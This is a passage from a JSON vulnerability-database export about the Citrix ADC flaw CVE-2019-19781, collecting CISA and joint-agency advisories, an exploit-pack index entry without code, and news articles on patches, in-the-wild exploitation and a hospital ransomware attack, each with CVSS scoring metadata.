2020.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) recommends users and administrators:\n\n * Review the Citrix article on [updates on Citrix ADC, Citrix Gateway vulnerability](<https://www.citrix.com/blogs/2020/01/17/citrix-updates-on-citrix-adc-citrix-gateway-vulnerability/>), published January 17, 2020;\n * See Citrix Security Bulletin [CTX267027 \u2013 Vulnerability in Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliance](<https://support.citrix.com/article/CTX267027>);\n * Apply the recommended mitigations in [CTX267679 \u2013 Mitigation Steps for CVE-2019-19781](<https://support.citrix.com/article/CTX267679>); and\n * Verify the successful application of the above mitigations by using the tool in [CTX269180 \u2013 CVE-2019-19781 \u2013 Verification ToolTest](<https://support.citrix.com/article/CTX269180>).\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/01/17/citrix-adds-sd-wan-wanop-updated-mitigations-cve-2019-19781>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-17T00:00:00", "type": "cisa", "title": "Citrix Adds SD-WAN WANOP, Updated Mitigations to CVE-2019-19781 Advisory", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-17T00:00:00", "id": "CISA:134C272F26FB005321448C648224EB02", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/01/17/citrix-adds-sd-wan-wanop-updated-mitigations-cve-2019-19781", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-29T18:14:37", "description": "CISA, the National Security Agency (NSA), and the Federal Bureau of Investigation (FBI) have released a [Joint Cybersecurity Advisory (CSA)](<https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF>) on Russian Foreign Intelligence Service (SVR) actors scanning for and exploiting vulnerabilities to compromise U.S. and allied networks, including national security and government-related systems.\n\nSpecifically, SVR actors are targeting and exploiting the following vulnerabilities:\n\n * [CVE-2018-13379 Fortinet FortiGate VPN](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>)\n * [CVE-2019-9670 Synacor Zimbra Collaboration Suite](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>)\n * [CVE-2019-11510 Pulse Secure Pulse Connect Secure VPN](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n * [CVE-2019-19781 Citrix Application Delivery Controller and Gateway](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\n * [CVE-2020-4006 VMware Workspace ONE Access](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>)\n\nAdditionally the White House has released a [statement](<https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/>) formally attributing this activity and the SolarWinds supply chain compromise to SVR actors. CISA has updated the following products to reflect this attribution:\n\n * [Alert AA20-352A: APT Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations](<https://us-cert.cisa.gov/ncas/alerts/aa20-352a>)\n * [Alert AA21-008A: Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments](<https://us-cert.cisa.gov/ncas/alerts/aa21-008a>)\n * [Alert AA21-077A: Detecting Post-Compromise Threat Activity Using the CHIRP IOC Detection Tool](<https://us-cert.cisa.gov/ncas/alerts/aa21-077a>)\n * [Malware Analysis Report AR21-039A: MAR-10318845-1.v1 - SUNBURST](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a>)\n * [Malware Analysis Report AR21-039B: MAR-10320115-1.v1 - TEARDROP](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039b>)\n * Table: SolarWinds and Active Directory/M365 Compromise - Detecting APT Activity from Known TTPs\n * [Remediating Networks Affected by the SolarWinds and Active Directory/M365 Compromise web page](<https://us-cert.cisa.gov/remediating-apt-compromised-networks>)\n * [Emergency Directive 21-01: Mitigate SolarWinds Orion Code Compromise](<https://cyber.dhs.gov/ed/21-01/>)\n\nCISA strongly encourages users and administrators to review [Joint CSA: Russian SVR Targets U.S. and Allied Networks](<https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2573391/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabili/>) for SVR tactics, techniques, and procedures, as well as mitigation strategies.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/04/15/nsa-cisa-fbi-joint-advisory-russian-svr-targeting-us-and-allied>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-04-15T00:00:00", "type": "cisa", "title": "NSA-CISA-FBI Joint Advisory on Russian SVR Targeting U.S. and Allied Networks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-09-28T00:00:00", "id": "CISA:E46D6B22DC3B3F8B062C07BD8EA4CB7C", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/04/15/nsa-cisa-fbi-joint-advisory-russian-svr-targeting-us-and-allied", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "canvas": [{"lastseen": "2021-07-28T14:33:27", "description": "**Name**| netscaler_traversal_rce \n---|--- \n**CVE**| CVE-2019-19781 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| netscaler_traversal_rce \n**Notes**| CVE Name: CVE-2019-19781 \nVENDOR: Citrix \nNOTES: This version of the module will take care of all our artifacts and will \nreport them just to be safe in case something went wrong during cleanup \n \nVersionsAffected: VERSIONS \nRepeatability: Infinite \nReferences: https://www.trustedsec.com/blog/critical-exposure-in-citrix-adc-netscaler-unauthenticated-remote-code-execution/ \nCVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781 \nDate public: 12/17/2019 \nCVSS: N/A \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-12-27T14:15:00", "type": "canvas", "title": "Immunity Canvas: NETSCALER_TRAVERSAL_RCE", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2019-12-27T14:15:00", "id": "NETSCALER_TRAVERSAL_RCE", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/netscaler_traversal_rce", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:40:08", "description": "[](<https://thehackernews.com/images/-YFnAQDBLWlw/X2h9bFB25hI/AAAAAAAAAyE/jMecIXHH_sMcXYoQN-b9qTiy868SAREGgCLcBGAsYHQ/s728/ransomware-attack-on-hospital.jpg>)\n\n \nGerman authorities last week [disclosed](<https://apnews.com/cf8f8eee1adcec69bcc864f2c4308c94>) that a ransomware attack on the University Hospital of D\u00fcsseldorf (UKD) caused a failure of IT systems, resulting in the death of a woman who had to be sent to another hospital that was 20 miles away.\n\nThe incident marks the first recorded casualty as a consequence of cyberattacks on critical healthcare facilities, which has ramped up in recent months.\n\nThe attack, which exploited a Citrix ADC [CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>) vulnerability to cripple the hospital systems on September 10, is said to have been \"misdirected\" in that it was originally intended for Heinrich Heine University, according to an extortion note left by the perpetrators.\n\nAfter law enforcement contacted the threat actors and informed them that they had encrypted a hospital, the operators behind the attack withdrew the ransom demand and provided the decryption key.\n\nThe case is currently being treated as a homicide, BBC News [reported](<https://www.bbc.com/news/technology-54204356>) over the weekend.\n\n### Unpatched Vulnerabilities Become Gateway to Ransomware Attacks\n\nAlthough several ransomware gangs said early on in the pandemic that they would not deliberately [target hospitals or medical facilities](<https://thehackernews.com/2016/11/hospital-cyber-attack-virus.html>), the recurring attacks [prompted the Interpol](<https://thehackernews.com/2020/04/cronavirus-hackers.html>) to issue a warning cautioning hospitals against ransomware attacks designed to lock them out of their critical systems in an attempt to extort payments.\n\nWeak credentials and VPN vulnerabilities have proven to be a blessing in disguise for threat actors to break into the internal networks of businesses and organizations, leading cybersecurity agencies in the U.S. and U.K. to publish [multiple](<https://thehackernews.com/2020/09/iranian-hackers-sanctioned.html>) [advisories](<https://www.ncsc.gov.uk/news/citrix-alert>) about active exploitation of the flaws.\n\n\"The [Federal Office for Information Security] is becoming increasingly aware of incidents in which Citrix systems were compromised before the security updates that were made available in January 2020 were installed,\" the German cybersecurity agency [said](<https://www.bsi.bund.de/DE/Presse/Pressemitteilungen/Presse2020/UKDuesseldorf_170920.html>) in an alert last week.\n\n\"This means that attackers still have access to the system and the networks behind it even after the security gap has been closed. This possibility is currently increasingly being used to carry out attacks on affected organizations.\"\n\nThe development also coincides with a fresh [advisory](<https://www.ncsc.gov.uk/news/alert-targeted-ransomware-attacks-on-uk-education-sector>) from the U.K. National Cyber Security Centre (NCSC), which said it's observed an uptick in ransomware incidents targeting educational institutions at least since August 2020, while urging schools and universities to implement a \"defence in depth\" strategy to defend against such malware attacks.\n\nSome of the affected institutions included [Newcastle](<https://www.ncl.ac.uk/itservice/latest-news/>) and [Northumbria](<https://www.bbc.com/news/uk-england-tyne-53989404>) Universities, among others.\n\nCiting Remote Desktop Protocol (RDP), vulnerable software or hardware, and email phishing as the three most common infection vectors, the agency [recommended](<https://blog.emsisoft.com/en/36921/8-critical-steps-to-take-after-a-ransomware-attack-ransomware-response-guide-for-businesses/>) organizations to maintain up-to-date offline backups, adopt endpoint malware protection, secure RDP services using multi-factor authentication, and have an effective patch management strategy in place.\n\n### A Spike in Ransomware Infections\n\nIf anything, the ransomware crisis seems to be only getting worse. [Historical data](<https://sites.temple.edu/care/ci-rw-attacks/>) gathered by Temple University's CARE cybersecurity lab has shown that there have been a total of 687 publicly disclosed cases in the U.S. since 2013, with 2019 and 2020 alone accounting for more than half of all reported incidents (440).\n\nGovernment facilities, educational institutions, and healthcare organizations are the most frequently hit sectors, as per the analysis.\n\nAnd if 2020 is any indication, attacks against colleges and universities are showing no signs of slowing down.\n\n[](<https://thehackernews.com/images/-w1AP-pVwnR0/X2h7szFvYJI/AAAAAAAAAx4/R2M_VI5F2gUCV9Dq0WYitww8OQ_Uz2P1gCLcBGAsYHQ/s0/ransomware-malware-attack-on-universities.jpg>)\n\nAllan Liska, a threat intelligence analyst at Recorded Future, revealed there had been at least 80 publicly reported ransomware infections targeting the education sector to date this year, a massive jump from 43 ransomware attacks for the whole of 2019.\n\n\"Part of this change can be attributed to extortion sites, which force more victims to announce attacks,\" Liska said in a [tweet](<https://twitter.com/uuallan/status/1307684719593746432>). \"But, in general, ransomware actors have more interest in going after colleges and universities, and they are often easy targets.\"\n\nYou can read more about NCSC's mitigation measures [here](<https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks>). For more guidance on proofing businesses against ransomware attacks, head to US Cybersecurity Security and Infrastructure Security Agency's response guide [here](<https://us-cert.cisa.gov/security-publications/Ransomware>).\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-21T10:20:00", "type": "thn", "title": "A Patient Dies After Ransomware Attack Paralyzes German Hospital Systems", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-09-21T10:34:14", "id": "THN:EB3F9784BB2A52721953F128D1B3EAEC", "href": "https://thehackernews.com/2020/09/a-patient-dies-after-ransomware-attack.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:52", "description": "[](<https://thehackernews.com/images/-C3dSDFvJiqA/XiW3-49gerI/AAAAAAAABUA/ZZoejAM3OJUPzdMEoE_ef-Wyi7-BtaokACLcBGAsYHQ/s728-e100/Citrix-ADC-Gateway-hacking.jpg>)\n\nCitrix has finally started rolling out security patches for a critical [vulnerability in ADC and Gateway](<https://thehackernews.com/2020/01/citrix-adc-gateway-exploit.html>) software that attackers started exploiting in the wild earlier this month after the company announced the existence of the issue without releasing any permanent fix. \n \nI wish I could say, \"better late than never,\" but since hackers don't waste time or miss any opportunity to exploit vulnerable systems, even a short window of time resulted in the compromise of hundreds of Internet exposed Citrix ADC and Gateway systems. \n \nAs explained earlier on The Hacker News, the vulnerability, tracked as **CVE-2019-19781**, is a path traversal issue that could allow unauthenticated remote attackers to execute arbitrary code on several versions of Citrix ADC and Gateway products, as well as on the two older versions of Citrix SD-WAN WANOP. \n \nRated critical with CVSS v3.1 base score 9.8, the issue was discovered by Mikhail Klyuchnikov, a security researcher at Positive Technologies, who responsibly reported it to Citrix in early December. \n \nThe vulnerability is actively being exploited in the wild since last week by dozens of hacking groups and individual attackers\u2014thanks to the public release of multiple [proofs-of-concept exploit code](<https://thehackernews.com/2020/01/citrix-adc-gateway-exploit.html>). \n \nAccording to cyber security [experts](<https://twitter.com/0xDUDE/status/1218988914272362496?s=08>), as of today, there are over 15,000 publicly accessible vulnerable Citrix ADC and Gateway servers that attackers can exploit overnight to target potential enterprise networks. \n \nFireEye experts found an attack campaign where someone was compromising vulnerable Citrix ADCs to install a previously-unseen payload, dubbed \"[NotRobin](<https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html>),\" that scans systems for cryptominers and malware deployed by other potential attackers and removes them to maintain exclusive backdoor access. \n \n\n\n> [#Citrix](<https://twitter.com/hashtag/Citrix?src=hash&ref_src=twsrc%5Etfw>) released a free tool that analyzes available log sources and system forensic artifacts to identify whether an ADC appliance has potentially been compromised using CVE-2019-19781 security flaw. \n \nYou can find the tool and instructions here: <https://t.co/eewijzI2l9>[#infosec](<https://twitter.com/hashtag/infosec?src=hash&ref_src=twsrc%5Etfw>) <https://t.co/YKMwgPzmYE>\n> \n> \u2014 The Hacker News (@TheHackersNews) [January 22, 2020](<https://twitter.com/TheHackersNews/status/1219994163581554689?ref_src=twsrc%5Etfw>)\n\n \n \n\"This actor exploits NetScaler devices using CVE-2019-19781 to execute shell commands on the compromised device,\" FireEye said. \n \n\"FireEye believes that the actor behind NOTROBIN has been opportunistically compromising NetScaler devices, possibly to prepare for an upcoming campaign. They remove other known malware, potentially to avoid detection by administrators.\" \n \n\n\n## Citrix Patch Timeline: Stay Tuned for More Software Updates!\n\n \nLast week Citrix [announced a timeline](<https://twitter.com/TheHackersNews/status/1216239812249702401>), promising to release patched firmware updates for all supported versions of ADC and Gateway software before the end of January 2020, as shown in the chart. \n\n\n[](<https://thehackernews.com/images/-GFKY1pukwgU/XiWsvTjWRzI/AAAAAAAABT0/6B9St94Mff0LZyZw6yzG2oMefLn6gMgGACLcBGAsYHQ/s728-e100/Citrix-ADC-Gateway.jpg>)\n\nAs part of its [first batch of updates](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>), Citrix today released permanent patches for ADC versions 11.1 and 12.0 that also apply to \"ADC and Gateway VPX hosted on ESX, Hyper-V, KVM, XenServer, Azure, AWS, GCP or on a Citrix ADC Service Delivery Appliance (SDX).\" \n \n\"It is necessary to upgrade all Citrix ADC and Citrix Gateway 11.1 instances (MPX or VPX) to build 11.1.63.15 to install the security vulnerability fixes. It is necessary to upgrade all Citrix ADC and Citrix Gateway 12.0 instances (MPX or VPX) to build 12.0.63.13 to install the security vulnerability fixes,\" Citrix said in its advisory. \n \n\"We urge customers to install these fixes immediately,\" the company said. \"If you have not already done so, you need to apply the previously supplied mitigation to ADC versions 12.1, 13, 10.5, and SD-WAN WANOP versions 10.2.6 and 11.0.3 until the fixes for those versions are available.\" \n \nThe company also warned that customers with multiple ADC versions in production must apply the correct version of patch to each system separately. \n \nBesides installing available patches for supported versions and applying the recommended mitigation for unpatched systems, Citrix ADC administrators are also advised to monitor their device logs for attacks. \n \n**UPDATE \u2014 **Citrix on Thursday also released [second batch of permanent security patches](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>) for critical RCE vulnerability affecting ADC and Gateway versions 12.1 and 13.0.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-20T14:24:00", "type": "thn", "title": "Citrix Releases Patches for Critical ADC Vulnerability Under Active Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-24T07:05:37", "id": "THN:166AAAF7F04EF01C9E049500387BD1FD", "href": "https://thehackernews.com/2020/01/citrix-adc-patch-update.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:53", "description": "[](<https://thehackernews.com/images/-_9-nocA92TI/XhmeU1ZwSqI/AAAAAAAA2KQ/m0YexAlFrVQzvw1H2fYT8uoiFY33g82DQCLcBGAsYHQ/s728-e100/citrix-adc-gateway-vulnerability.jpg>)\n\nIt's now or never to prevent your enterprise servers running vulnerable versions of Citrix application delivery, load balancing, and Gateway solutions from getting hacked by remote attackers. \n \nWhy the urgency? Earlier today, multiple groups publicly released weaponized proof-of-concept exploit code [[1](<https://github.com/trustedsec/cve-2019-19781>), [2](<https://github.com/projectzeroindia/CVE-2019-19781>)] for a recently disclosed remote code execution vulnerability in Citrix's NetScaler ADC and Gateway products that could allow anyone to leverage them to take full control over potential enterprise targets. \n \nJust before the last Christmas and year-end holidays, Citrix [announced](<https://support.citrix.com/article/CTX267027>) that its Citrix Application Delivery Controller (ADC) and Citrix Gateway are vulnerable to a critical path traversal flaw (CVE-2019-19781) that could allow an unauthenticated attacker to perform arbitrary code execution on vulnerable servers. \n \nCitrix confirmed that the flaw affects all supported version of the software, including: \n \n\n\n * Citrix ADC and Citrix Gateway version 13.0 all supported builds\n * Citrix ADC and NetScaler Gateway version 12.1 all supported builds\n * Citrix ADC and NetScaler Gateway version 12.0 all supported builds\n * Citrix ADC and NetScaler Gateway version 11.1 all supported builds\n * Citrix NetScaler ADC and NetScaler Gateway version 10.5 all supported builds\n \nThe company made the disclose without releasing any security patches for vulnerable software; instead, [Citrix offered mitigation](<https://support.citrix.com/article/CTX267679>) to help administrators guard their servers against potential remote attacks\u2060\u2014and even at the time of writing, there's no patch available almost 23 days after disclosure. \n \n\n\n \nThrough the cyberattacks against vulnerable servers were [first seen in the wild](<https://twitter.com/sans_isc/status/1213228049011007489>) last week when hackers developed private exploit after reverse engineering mitigation information, the public release of weaponized PoC would now make it easier for low-skilled script kiddies to launch cyberattacks against vulnerable organizations. \n \nAccording to [Shodan](<https://beta.shodan.io/search/facet?query=http.waf%3A%22Citrix+NetScaler%22&facet=org>), at the time of writing, there are over 125,400 Citrix ADC or Gateway servers publicly accessible and can be exploited overnight if not taken offline or protected using available mitigation. \n \nWhile discussing [technical details](<https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/>) of the flaw in a blog post published yesterday, MDSsec also released a video demonstration of the exploit they developed but chose not to release it at this moment. \n \nBesides applying the recommended mitigation, Citrix ADC administrators are also advised to monitor their device logs for attacks.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-11T10:21:00", "type": "thn", "title": "PoC Exploits Released for Citrix ADC and Gateway RCE Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-11T10:22:37", "id": "THN:6ED39786EE29904C7E93F7A0E35A39CB", "href": "https://thehackernews.com/2020/01/citrix-adc-gateway-exploit.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:40:15", "description": "[](<https://thehackernews.com/images/-YFgpJhs_wIc/XwV5FgvOBvI/AAAAAAAAAi0/I-4cCa2dIG4SoMiPExrAAoVmPOMt6TE-ACLcBGAsYHQ/s728-e100/citrix-software.jpg>)\n\nCitrix yesterday issued new security patches for as many as [11 security flaws](<https://www.citrix.com/blogs/2020/07/07/citrix-provides-context-on-security-bulletin-ctx276688/>) that affect its Citrix Application Delivery Controller (ADC), Gateway, and SD-WAN WAN Optimization edition (WANOP) networking products. \n \nSuccessful exploitation of these critical flaws could let unauthenticated attackers perform code injection, information disclosure, and even denial-of-service attacks against the gateway or the [authentication virtual servers](<https://docs.citrix.com/en-us/netscaler/12/aaa-tm/authentication-virtual-server.html>). \n \nCitrix confirmed that the aforementioned issues do not impact other virtual servers, such as load balancing and content switching virtual servers. \n \nAmong the affected Citrix SD-WAN WANOP appliances include models 4000-WO, 4100-WO, 5000-WO, and 5100-WO. \n \nThe networking vendor also reiterated that these vulnerabilities were not connected to a previously fixed [zero-day NetScaler flaw](<https://thehackernews.com/2020/01/citrix-adc-patch-update.html>) (tagged as [CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)) that allowed bad actors to perform [arbitrary code execution](<https://support.citrix.com/article/CTX267027>) even without proper authentication. \n \nIt also said there's no evidence the newly disclosed flaws are exploited in the wild and that barriers to exploitation of these flaws are high. \n \n\"Of the 11 vulnerabilities, there are six possible attacks routes; five of those have barriers to exploitation,\" Citrix's CISO Fermin Serna said. \"Two of the remaining three possible attacks additionally require some form of existing access. That effectively means an external malicious actor would first need to gain unauthorized access to a vulnerable device to be able to conduct an attack.\" \n \nAlthough Citrix has refrained from publishing technical details of the vulnerabilities citing malicious actors' efforts to leverage the patches and the information to reverse engineer exploits, attacks on the management interface of the products could result in system compromise by an unauthenticated user, or through Cross-Site Scripting (XSS) on the management interface. \n \nAn adversary could also create a download link for a vulnerable device, which could result in the compromise of a local computer upon execution by an unauthenticated user on the management network. \n \nA second class of attacks concerns virtual IPs (VIPs), permitting an attacker to mount DoS against the Gateway or remotely scan the ports of the internal network. \n \n\"Attackers can only discern whether a TLS connection is possible with the port and cannot communicate further with the end devices,\" Citrix noted in its [advisory](<https://support.citrix.com/article/CTX276688>). \n \nIn addition, a separate vulnerability in Citrix Gateway Plug-in for Linux (CVE-2020-8199) would grant a local logged-on user of a Linux system to elevate their privileges to an administrator account on that system. \n \nAccording to a [Positive Technologies](<https://www.ptsecurity.com/ww-en/about/news/citrix-vulnerability-allows-criminals-to-hack-networks-of-80000-companies/>) report last December, the traffic management and secure remote access applications are used by over 80,000 organizations across the world. \n \nIt's recommended that download and apply the latest builds for Citrix ADC, Citrix Gateway, and Citrix SD-WAN WANOP appliances as soon as possible to mitigate risk and defend against potential attacks designed to exploit these flaws.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-08T07:43:00", "type": "thn", "title": "Citrix Issues Critical Patches for 11 New Flaws Affecting Multiple Products", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 